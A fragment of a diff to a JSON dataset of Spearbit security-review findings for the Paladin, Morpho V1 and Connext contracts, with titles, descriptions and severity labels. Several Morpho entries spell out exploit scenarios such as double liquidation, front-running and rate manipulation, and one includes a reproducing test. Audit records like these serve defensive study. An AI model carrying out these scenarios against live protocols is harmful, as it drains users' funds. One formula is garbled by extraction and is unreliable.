require(IGaugeController(GAUGE_CONTROLLER).gauge_types(gauge) >= 0, \"QuestBoard: Invalid Gauge\"); ... }", + "title": "Extra safety checks in _removeAssetId()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _removeAssetId() deletes assets but it doesn't check if the passed parameters are a consistent set. This allows for mistakes where the wrong values are accidentally deleted. function _removeAssetId(bytes32 _key, address _adoptedAssetId, address _representation) internal { ... delete s.adoptedToCanonical[_adoptedAssetId]; delete s.representationToCanonical[_representation]; ... }", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Missing setter function for the GAUGE_CONTROLLER", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The GAUGE_CONTROLLER address is immutable and set in the constructor. If Curve adds a new version of the gauge controller, the value of GAUGE_CONTROLLER cannot be updated and the contract QuestBoard needs to be deployed again. address public immutable GAUGE_CONTROLLER; constructor(address _gaugeController, address _chest){ GAUGE_CONTROLLER = _gaugeController; ... }", + "title": "Data length not validated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The following functions do not validate that the input _data is 32 bytes. GnosisSpokeConnector._sendMessag GnosisSpokeConnector._processMessage BaseMultichain.sendMessage OptimismSpokeConnector._sendMessage The input _data contains the outbound Merkle root or aggregated Merkle root, which is always 32 bytes. If the root is not 32 bytes, it is invalid and should be rejected.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Empty events emitted in killBoard() and unkillBoard() functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "When an event is emitted, it stores the arguments passed in for the transaction logs. Currently the Killed() and Unkilled() events are emitted without any arguments passed into them defeating the purpose of using an event.", + "title": "Verify timestamp reliability on L2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Timestamp information on rollups can be less reliable than on mainnet. For instance, Arbitrum docs say: As a general rule, any timing assumptions a contract makes about block numbers and timestamps should be considered generally reliable in the longer term (i.e., on the order of at least several hours) but unreliable in the shorter term (minutes). (It so happens these are generally the same assumptions one should operate under when using block numbers directly on Ethereum!) Uniswap docs mention this for Optimism: The block.timestamp of these blocks, however, reflect the block.timestamp of the last L1 block ingested by the Sequencer.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Liquidating Morpho's Aave position leads to state desync", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Morpho has a single position on Aave that encompasses all of Morpho's individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desyncs from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It's also possible to double-liquidate for a profit. Example: There's a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho The ETH price crashes and the position becomes liquidatable. A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The user's supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. The state remains desynced.", + "title": "MirrorConnector cannot be changed once set", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For chains other than Polygon, it is allowed to change mirror connector any number of times. For Polygon chain, the _setMirrorConnector is overridden. 1. Let's take PolygonHubConnector contract example: function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } 2. Since setFxChildTunnel(PolygonHubConnector) can only be called once due to below require check, this also restricts the number of time mirror connector can be altered. function setFxChildTunnel(address _fxChildTunnel) public virtual { require(fxChildTunnel == address(0x0), \"FxBaseRootTunnel: CHILD_TUNNEL_ALREADY_SET\"); ... } 54", "labels": [ "Spearbit", - "MorphoV1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "A market could be deprecated but still prevent liquidators to liquidate borrowers if isLiquidateBor- rowPaused is true", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Currently, when a market must be deprecated, Morpho checks that borrowing has been paused before applying the new value for the flag. function setIsDeprecated(address _poolToken, bool _isDeprecated) external onlyOwner isMarketCreated(_poolToken) { } if (!marketPauseStatus[_poolToken].isBorrowPaused) revert BorrowNotPaused(); marketPauseStatus[_poolToken].isDeprecated = _isDeprecated; emit IsDeprecatedSet(_poolToken, _isDeprecated); The same check should be done in isLiquidateBorrowPaused, allowing the deprecation of a market only if isLiq- uidateBorrowPaused == false otherwise liquidators would not be able to liquidate borrowers on a deprecated market.", + "title": "Possible infinite loop in dequeueVerified()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The loop in function dequeueVerified() doesn't end if queue.first == queue.last == 0. In this situation, at unchecked { --last; } the following happens: last wraps to type(uint128).max. Now last is very large and is surely >=first and thus the loop keeps running. This problem can occur when queue isn't initialized. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { uint128 first = queue.first; uint128 last = queue.last; require(last >= first, \"queue empty\"); for (last; last >= first; ) { ... unchecked { --last; } // underflows when last == 0 (e.g. queue isn't initialized) } }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "setIsPausedForAllMarkets bypass the check done in setIsBorrowPaused and allow resuming borrow on a deprecated market", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The MorphoGovernance contract allow Morpho to set the isBorrowPaused to false only if the market is not deprecated. function setIsBorrowPaused(address _poolToken, bool _isPaused) external onlyOwner isMarketCreated(_poolToken) { } if (!_isPaused && marketPauseStatus[_poolToken].isDeprecated) revert MarketIsDeprecated(); marketPauseStatus[_poolToken].isBorrowPaused = _isPaused; emit IsBorrowPausedSet(_poolToken, _isPaused); This check is not enforced by the _setPauseStatus function, called by setIsPausedForAllMarkets allowing Mor- pho to resume borrowing for deprecated market. Test to reproduce the issue // SPDX-License-Identifier: AGPL-3.0-only pragma solidity ^0.8.0; import \"./setup/TestSetup.sol\"; contract TestSpearbit is TestSetup { using WadRayMath for uint256; function testBorrowPauseCheckSkipped() public { // Deprecate a market morpho.setIsBorrowPaused(aDai, true); morpho.setIsDeprecated(aDai, true); checkPauseEquality(aDai, true, true); // you cannot resume the borrowing if the market is deprecated hevm.expectRevert(abi.encodeWithSignature(\"MarketIsDeprecated()\")); morpho.setIsBorrowPaused(aDai, false); checkPauseEquality(aDai, true, true); // but this check is skipped if I call directly `setIsPausedForAllMarkets` morpho.setIsPausedForAllMarkets(false); // this should revert because // you cannot resume borrowing for a deprecated market checkPauseEquality(aDai, false, true); } function checkPauseEquality( address aToken, bool shouldBePaused, 6 bool shouldBeDeprecated ) public { ( bool isSupplyPaused, bool isBorrowPaused, bool isWithdrawPaused, bool isRepayPaused, bool isLiquidateCollateralPaused, bool isLiquidateBorrowPaused, bool isDeprecated ) = morpho.marketPauseStatus(aToken); assertEq(isBorrowPaused, shouldBePaused); assertEq(isDeprecated, shouldBeDeprecated); } }", + "title": "Do not ignore staticcall's return value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TypedMemView calls several precompiles through staticcall opcode and never checks its return value assuming it is a success. For instance: TypedMemView.sol#L668-L669, TypedMemView.sol#L685-L686, // use the identity precompile to copy // guaranteed not to fail, so pop the success pop(staticcall(gas(), 4, _oldLoc, _len, _newLoc, _len)) However, there are rare cases when call to precompiles can fail. For example, when the call runs out of gas (since 63/64 of the gas is passed, the remaining execution can still have gas). Generally, not checking for success of calls is dangerous and can have unintended consequences.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk TypedMemView.sol#L652," ] }, { - "title": "User withdrawals can fail if Morpho position is close to liquidation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool (\"hard withdraw\"). If the Morpho position on Aave's debt / collateral value is higher than the market's max LTV ratio but lower than the market's liquidation threshold, the borrow will fail and the position can also not be liquidated. The withdrawals could fail.", + "title": "Renounce wait time can be extended", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The _proposedOwnershipTimestamp updates everytime on calling proposeNewOwner with newlyPro- posed as zero address. This elongates the time when owner can be renounced.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "P2P borrowers' rate can be reduced", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Users on the pool currently earn a much worse rate than users with P2P credit lines. There's a queue for being connected P2P. As this queue could not be fully processed in a single transaction the protocol introduces the concept of a max iteration count and a borrower/supplier \"delta\" (c.f. yellow paper). This delta leads to a worse rate for existing P2P users. An attacker can force a delta to be introduced, leading to worse rates than before. Example: Imagine some borrowers are matched P2P (earning a low borrow rate), and many are still on the pool and therefore in the pool queue (earning a worse borrow rate from Aave). An attacker supplies a huge amount, creating a P2P credit line for every borrower. (They can repeat this step several times if the max iterations limit is reached.) 7 The attacker immediately withdraws the supplied amount again. The protocol now attempts to demote the borrowers and reconnect them to the pool. But the algorithm performs a \"hard withdraw\" as the last step if it reaches the max iteration limit, creating a borrower delta. These are funds borrowed from the pool (at a higher borrowing rate) that are still wrongly recorded to be in a P2P position for some borrowers. This increase in borrowing rate is socialized equally among all P2P borrowers. (reflected in an updated p2pBorrowRate as the shareOfDelta increased.) The initial P2P borrowers earn a worse rate than before. If the borrower delta is large, it's close to the on-pool rate. If an attacker-controlled borrower account was newly matched P2P and not properly reconnected to the pool (in the \"demote borrowers\" step of the algorithm), they will earn a better P2P rate than the on-pool rate they earned before.", + "title": "Extra parameter in function checker() at encodeWithSelector()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function checker() sets up the parameters to call the function sendMessage(). However, it adds an extra parameter outboundRoot, which isn't necessary. function sendMessage() external { ... } function checker() external view override returns (bool canExec, bytes memory execPayload) { ... execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); // extra parameter ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk Original" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Frontrunners can exploit system by not allowing head of DLL to match in P2P", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "For a given asset x, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x whenever there is a new transaction in the mempool to borrow 100 units of x, Frontrunner supplies 1001 units of x and is supplied on pool. updateSuppliers will put the frontrunner on the head (assuming very high gas is supplied). Borrower's transaction lands and is matched 100 units of x with a frontrunner in p2p. Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: Relatively fewer gas fees & relatively high block gas limit. insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block's time period.", + "title": "MerkleLib.insert() can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "storage. Each call to MerkleLib.insert() reads the entire tree from storage, and writes 2 (tree.count and tree.branch[i]) back to storage. These storage operations can be done only once at the beginning, by loading them in memory. The updated count and branches can be written back to the storage at the end saving expensive SSTORE and SLOAD operations.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Compound borrow validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; Compound has a mechanism to prevent borrows if the new borrowed amount would go above the current borrowCaps[cToken] threshold. Morpho does not check this threshold and could allow users to borrow on the P2P side (avoiding the revert because it would not trigger the underlying compound borrow action). Morpho should anyway monitor the borrowCaps of the market because it could make increaseP2PDeltasLogic and _unsafeWithdrawLogic reverts. Both Morpho and Compound do not check if a market is in \"deprecated\" state. This means that as soon as a user borrows some tokens, he/she can be instantly liquidated by another user. If the flag is true on Compound, the Morpho User can be liquidated directly on compound. If the flag is true on Morpho, the borrower can be liquidated on Morpho. Morpho does not check if borrowGuardianPaused[cToken] on Compound, a user could be able to borrow in P2P while the cToken market has borrow paused. More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", + "title": "EIP712 domain separator can be cached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The domain separator can be cached for gas-optimization.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Users can continue to borrow from a deprecated market", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When a market is being marked as deprecated, there is no verification that the borrow for that market has already been disabled. This means a user could borrow from this market and immediately be eligible to be liquidated.", + "title": "stateCommitmentChain can be made immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once assigned in constructor, stateCommitmentChain cannot be changed.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "ERC20 with transfer's fee are not handled by *PositionManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Some ERC20 tokens could have fees attached to the transfer event, while others could enable them in the future (see USDT, USDC). The current implementation of both PositionManager (for Aave and Compound) is not taking into consideration these types of ERC20 tokens. While Aave seems not to take into consideration this behavior (see LendingPool.sol), Compound, on the other hand, is explicitly handling it inside the doTransferIn function. Morpho is taking for granted that the amount specified by the user will be the amount transferred to the contract's balance, while in reality, the contract will receive less. In supplyLogic, for example, Morpho will account for the user's p2p/pool balance for the full amount but will repay/supply to the pool less than the amount accounted for.", + "title": "Nonce can be updated in single step", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Nonce can be incremented in single step instead of using a second step which will save some gas", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Cannot liquidate Morpho users if no liquidity on the pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Morpho implements liquidations by repaying the borrowed asset and then withdrawing the collateral If there is no liquidity in the collateral asset pool the asset from the underlying protocol (Aave / Compound). liquidation will fail. Morpho could incur bad debt as they cannot liquidate the user. The liquidation mechanisms of Aave and Compound work differently: They allow the liquidator to seize the debtorsTokens/cTokens which can later be withdrawn for the underlying token once there is enough liquidity in the pool. Technically, an attacker could even force no liquidity on the pool by frontrunning liquidations by borrowing the entire pool amount - preventing them from being liquidated on Morpho. However, this would require significant capital as collateral in most cases.", + "title": "ZkSyncSpokeConnector._sendMessage encodes unnecessary data", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Augmenting the _data with the processMessage function selector is unnecessary. Since on the mirror domain, we just need to provide the right parameters to ZkSyncHubConnector.processMessageFromRoot (which by the way anyone can call) to prove the L2 message inclusion of the merkle root _data. Thus the current implementation is wasting gas.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Supplying and borrowing can recreate p2p credit lines even if p2p is disabled", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When supplying/borrowing the algorithm tries to reduce the deltas p2pBorrowDelta/p2pSupplyDelta by moving borrowers/suppliers back to P2P. It is not checked if P2P is enabled. This has some consequences related to when governance disables P2P and wants to put users and liquidity back on the pool through increaseDelta calls. The users could enter P2P again by supplying and borrowing.", + "title": "getD can be optimized by removing an extra multiplication by d per iteration", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The calculation for the new d can be simplified by canceling a d from the numerator and denominator. Basically, we have : f (D) = 1 nn+1a Q xi Dn+1 + (1 (cid:0) 1 na )D (cid:0) X xi 59 and having/assuming n, a, xi are fixed, we are using Newton's method to find a solution for f = 0. The original implementation is using: D0 = D (cid:0) f (D) f 0(D) = which can be simplified to: (na P xi + Dn+1 nn(cid:0)1 Q xi )D (na (cid:0) 1)D + (n + 1) Dn+1 nn Q xi na P xi + D0 = Dn nn(cid:0)1 (na (cid:0) 1) + (n + 1) D Q xi Dn Q xi nn", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "In Compound implementation, P2P indexes can be stale", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current implementation of MorphoUtils._isLiquidatable loops through all of the tokens in which the user has supplied to/borrowed from. The scope of the function is to check whether the user can be liquidated or not by verifying that debtValue > maxDebtValue. Resolving \"Compound liquidity computation uses outdated cached borrowIndex\" implies that the Compound bor- row index used is always up-to-date but the P2P issues associated with the token could still be out of date if the market has not been used recently, and the underlying Compound indexes (on which the P2P index is based) has changed a lot. As a consequence, all the functions that rely on _isLiquidatable (liquidate, withdraw, borrow) could return a wrong result if the majority of the user's balance is on the P2P balance (the problem is even more aggravated without resolving \"Compound liquidity computation uses outdated cached borrowIndex\". Let's say, for example: Alice supplies ETH in pool Alice supplies BAT in P2P Alice borrows some DAI At some point in time the ETH value goes down, but the interest rate of BAT goes up. If the P2P index of BAT had been correctly up-to-date, Alice would have been still solvent, but she gets liquidated by Bob who calls liq- uidate(alice, ETH, DAI) Even by fixing \"Compound liquidity computation uses outdated cached borrowIndex\" Alice would still be liquidated because her entire collateral is on P2P and not in the pool.", + "title": "_recordOutputAsSpent in ArbitrumHubConnector can be optimized by changing the require condition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In _recordOutputAsSpent, _index is compared with a literal value that is a power of 2. The expo- nentiation in this statement can be completely removed to save gas.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Turning off an asset as collateral on Morpho-Aave still allows seizing of that collateral on Morpho and leads to liquidations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho Aave deployment can set the asset to not be used as collateral for Aave's Morpho contract position. On Aave, this prevents liquidators from seizing this asset as collateral. 1. However, this prevention does not extend to users on Morpho as Morpho has not implemented this check. Liquidations are performed through a repay & withdraw combination and withdrawing the asset on Aave is still allowed. 2. When turning off the asset as collateral, the single Morpho contract position on Aave might still be over- collateralized, but some users on Morpho suddenly lose this asset as collateral (LTV becomes 0) and will be liquidated.", + "title": "Message.leaf's memory manipulation is redundant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The chunk of memory related to _message is dissected into pieces and then copied into another section of memory and hashed.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "claimToTreasury(COMP) steals users' COMP rewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The claimToTreasury function can send a market's underlying tokens that have been accumulated in the contract to the treasury. This is intended to be used for the reserve amounts that accumulate in the contract from P2P matches. However, Compound also pays out rewards in COMP and COMP is a valid Compound market. Sending the COMP reserves will also send the COMP rewards. This is especially bad as anyone can claim COMP rewards on the behalf of Morpho at any time and the rewards will be sent to the contract. An attacker could even frontrun a claimToTreasury(cCOMP) call with a Comptroller.claimComp(morpho, [cComp]) call to sabotage the reward system. Users won't be able to claim their rewards.", + "title": "coerceBytes32 can be more optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "It would be cheaper to not use TypedMemView in coerceBytes32(). We would only need to check the length and mask. Note: coerceBytes32 doesn't seem to be used. If that is the case it could also be removed.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Compound liquidity computation uses outdated cached borrowIndex", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The _isLiquidatable iterates over all user-entered markets and calls _getUserLiquidity- DataForAsset(poolToken) -> _getUserBorrowBalanceInOf(poolToken). However, it only updates the indexes of markets that correspond to the borrow and collateral assets. The _getUserBorrowBalanceInOf function computes the underlying pool amount of the user as userBorrowBalance.onPool.mul(lastPoolIndexes[_- poolToken].lastBorrowPoolIndex);. Note that lastPoolIndexes[_poolToken].lastBorrowPoolIndex is a value that was cached by Morpho and it can be outdated if there has not been a user-interaction with that market for a long time. The liquidation does not match Compound's liquidation anymore and users might not be liquidated on Morpho that could be liquidated on Compound. Liquidators would first need to trigger updates to Morpho's internal borrow indexes.", + "title": "Consider removing domains from propagate() arguments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "propagate(uint32[] calldata _domains, address[] calldata _connectors) only uses _do- mains to verify its hash against domainsHash, and to emit an event. Hence, its only use seems to be to notify off-chain agents of the supported domains.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "HeapOrdering.getNext returns the root node for nodes not in the list", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "If an id does not exist in the HeapOrdering the getNext() function will return the root node uint256 rank = _heap.ranks[_id]; // @audit returns 0 as rank. rank + 1 will be the root if (rank < _heap.accounts.length) return getAccount(_heap, rank + 1).id; else return address(0);", + "title": "Loop counter can be made uint256 to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "There are several loops that use an uint8 as the type for the loop variable. Changing that to uint256 can save some gas.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Heap only supports balances up to type(uint96).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current heap implementation packs an address and the balance into a single storage slot which If a token has 18 decimals, the largest restricts the balance to the uint96 type with a max value of ~7.9e28. balance that can be stored will be 7.9e10. This could lead to problems with a token of low value, for example, if 1.0 tokens are worth 0.0001$, a user could only store 7_900_000$.", + "title": "Set owner directly to zero address in renounceOwnership", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "1. In renounceOwnership function, _proposed will always be address zero so instead of setting the variable _proposed as owner, we can directly set address(0) as the new owner. 2. Similarly for renounceOwnership function also set address(0) as the new owner.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Delta leads to incorrect reward distributions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Delta describes the amount that is on the pool but still wrongly tracked as inP2P for some users. There are users that do not have their P2P balance updated to an equivalent pool balance and therefore do not earn rewards. There is now a mismatch of this delta between the pool balance that earns a reward and the sum of pool balances that are tracked in the reward manager to earn that reward. The increase in delta directly leads to an increase in rewards for all other users on the pool.", + "title": "Retrieve decimals() once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "There are several locations where the number of decimals() of tokens are retrieved. As all tokens are whitelisted, it would also be possible to retrieve the decimals() once and store these to save gas. BridgeFacet.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... ,! } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "When adding a new rewards manager, users already on the pool won't be earning rewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When setting a new rewards manager, existing users that are already on the pool are not tracked and won't be earning rewards.", + "title": "The root... function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "We can use assembly, unroll loops, and use the scratch space to save gas. Also, rootWithCtx can be removed (would save us from jumping) since it has only been used here.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "liquidationThreshold computation can be moved for gas efficiency", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The vars.liquidationThreshold computation is only relevant if the user is supplying this asset. Therefore, it can be moved to the if (_isSupplying(vars.userMarkets, vars.borrowMask)) branch.", + "title": "The insert function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If we use assembly. the scratch space for hashing and unrolling the loop, we can save some gas.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Gas Optimization" ] }, { - "title": "Add max approvals to markets upon market creation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Approvals to the Compound markets are set on each supplyToPool function call.", + "title": "branchRoot function in Merkle.sol can be more optimized by using YUL, unrolling the loop and using the scratch space", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "We can use assembly, unroll the loop in branchRoot, and use the scratch space to save gas.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Gas Optimization" ] }, { - "title": "isP2PDisabled flag is not updated by setIsPausedForAllMarkets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The current implementation of _setPauseStatus does not update the isP2PDisabled. When _- isPaused = false this is not a real problem because once all the flags are enabled (everything is paused), all the operations will be blocked at the root of the execution of the process. There might be cases instead where isP2PDisabled and the other flags were disabled for a market and Morpho want to enable all of them, resuming all the operations and allowing the users to continue P2P usage. In this case, Morpho would only resume operations without allowing the users to use the P2P flow. function _setPauseStatus(address _poolToken, bool _isPaused) internal { Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken]; pause.isSupplyPaused = _isPaused; pause.isBorrowPaused = _isPaused; pause.isWithdrawPaused = _isPaused; pause.isRepayPaused = _isPaused; pause.isLiquidateCollateralPaused = _isPaused; pause.isLiquidateBorrowPaused = _isPaused; // ... event emissions }", + "title": "Replace divisions by powers of 2 by right shifts and multiplications by left shifts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When a variable X is divided (multiplied) by a power of 2 (C = 2 c) which is a constant value, the division (multiplication) operation can be replaced by a right (left) shift to save gas.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Aave liquidate validation logic", - "html_url": 